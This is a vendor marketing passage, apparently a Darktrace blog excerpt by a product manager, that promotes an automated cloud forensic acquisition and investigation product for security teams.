Until now, forensic investigations were slow, manual, and reserved for only the largest organizations with specialized DFIR expertise. Darktrace / Forensic Acquisition & Investigation changes that by leveraging the scale and elasticity of the cloud itself to automate the entire investigation process. From capturing full disk and memory at detection to reconstructing attacker timelines in minutes, the solution turns fragmented workflows into streamlined investigations available to every team.

Whether deployed as a SaaS-delivered service for fast time-to-value or as a self-hosted appliance for deep integration, Darktrace / Forensic Acquisition & Investigation provides the features that matter most: automated evidence capture, cross-cloud investigations, forensic depth for ephemeral assets, and root cause clarity without manual effort.

With Darktrace / Forensic Acquisition & Investigation, what once took days now takes minutes. Now, forensic investigations in the cloud are faster, more scalable, and finally accessible to every security team, no matter their size or expertise.

[related-resource]

Sources: [1], [2] Darktrace Report: Organizations Require a New Approach to Handle Investigations in the Cloud

Additional Resources

Continue reading
About the author
Paul Bottomley
Director of Product Management | Darktrace
Your data. Our AI.
Elevate your network security with Darktrace AI